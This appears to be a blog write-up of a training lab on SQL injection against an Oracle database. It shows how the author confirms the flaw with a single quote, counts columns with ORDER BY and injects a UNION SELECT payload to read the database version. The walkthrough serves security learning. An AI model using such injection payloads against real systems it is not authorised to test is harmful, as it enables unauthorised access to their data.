03 - SQL injection attack, querying the database type and version on Oracle

This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query. To solve the lab, display the database version string.

given : Injection point (Product category) , Database (oracle)
End goal : Display the database version

start the lab by clicking on the "ACCESS THE LAB" button.

After starting the lab click on any category filter and intercept the request. The request looks like :

Putting a single quote at the end of category gives an 500 which ensures the possibility of sqli

So now we have to find number of columns in the database to make the injected union query successfully. To find the number of column we cane use order by method. It gives an error if you put the number which is more than the available cloumns in that table. ORDER BY 2-- gives 200 ok. but when I enter 3 then it gives 500 error which means there are 2 columns.

Now we know the number of coumns in the table so the possible injected query can be : UNION SELECT banner,null FROM v$version--

Lab solved :

Prev Next

CAPA: The Basics01/02/25 ctf → thm → capa-the-basics

SQLMap: The Basics31/01/25 ctf → thm → sqlmap-the-basics

SQL Fundamentals31/01/25 ctf → thm → sql-fundamentals

Powershell30/01/25 programming → powershell